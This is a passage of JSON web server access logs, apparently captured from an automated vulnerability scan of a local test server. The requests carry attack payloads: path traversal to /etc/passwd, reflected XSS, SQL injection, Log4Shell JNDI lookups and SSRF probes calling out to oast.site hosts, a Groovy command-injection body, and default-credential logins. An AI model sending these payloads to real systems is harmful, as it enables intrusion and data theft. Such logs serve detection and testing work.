+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nuxeo/login.jsp/pwn$%7B31333333330+7%7D.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /timesheet/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/app/something/services/AppModule.class/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/code?root=&dag_id=example_passing_params_via_test_command HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.ca281d8smpvb9r2g07h0qj1tk7f6a7efx.oast.site/test}&url=https://localhost HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/_catalog HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"\x0D\x0A\x0D\x0Aextended_version\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22lang\x22:\x22groovy\x22,\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getText()\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxwebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/configprops HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"j_username=admin&j_password=password","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pentaho/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /code?dag_id=example_passing_params_via_test_command HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CF_SFSD/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://example.com&action=nf_oauth_connect HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"{\x22username\x22:\x22user\x22,\x22password\x22:\x22pass\x22,\x22remember\x22:\x22${jndi:ldap://${hostName}.ca281d8smpvb9r2g07h0pc91mouxbpy5w.oast.site}\x22,\x22strict\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/manage/account/login?redirect=%2Fmanage", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/x.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mobile/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /neos/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?x=${jndi:ldap://${hostName}.uri.ca281d8smpvb9r2g07h019q6adag5ybo6.oast.site/a} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide-scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?qtproxycall=http://ca281d8smpvb9r2g07h09dixywgkci7q5.oast.site HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /umbraco/BackOffice/Api/Help/GetContextHelpForPage?section=content&tree=undefined&baseUrl=http://ca281d8smpvb9r2g07h0h7dtxxx6y4qau.oast.site HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x22123456789\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 +0000","request_body":"new_login_session_management=1&languageChoice=1&authUser=admin&clearPass=pass&languageChoice=10","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:37 